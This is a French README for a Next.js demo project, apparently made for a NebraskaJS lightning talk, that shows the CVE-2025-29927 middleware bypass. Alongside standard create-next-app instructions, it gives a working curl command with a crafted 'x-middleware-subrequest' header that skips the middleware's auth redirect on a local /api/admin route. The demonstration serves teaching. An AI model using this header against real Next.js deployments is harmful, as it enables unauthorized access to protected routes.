
Une démo de la vulnérabilité CVE-2025-29927 pour un lightning talk NebraskaJS
Ceci est un projet Next.js créé avec create-next-app.
Tout d'abord, vous pouvez confirmer que le middleware fonctionne et doit rediriger l'utilisateur :
curl http://localhost:3000/api/admin
Ensuite, vous pouvez montrer comment le middleware est contourné avec la commande suivante :
curl -H "x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware" http://localhost:3000/api/admin
Tout d'abord, lancez le serveur de développement :
npm run dev
# or
yarn dev
# or
pnpm dev
# or
bun dev
Ouvrez http://localhost:3000 dans votre navigateur pour voir le résultat.
Vous pouvez commencer à éditer la page en modifiant app/page.tsx. La page se met automatiquement à jour lorsque vous modifiez le fichier.
Ce projet utilise next/font pour optimiser et charger automatiquement Geist, une nouvelle famille de polices pour Vercel.
Pour en savoir plus sur Next.js, consultez les ressources suivantes :
Vous pouvez consulter le dépôt GitHub de Next.js - vos retours et contributions sont les bienvenus !
Le moyen le plus simple de déployer votre application Next.js est d'utiliser la plateforme Vercel créée par les développeurs de Next.js.
Consultez notre documentation sur le déploiement de Next.js pour plus de détails.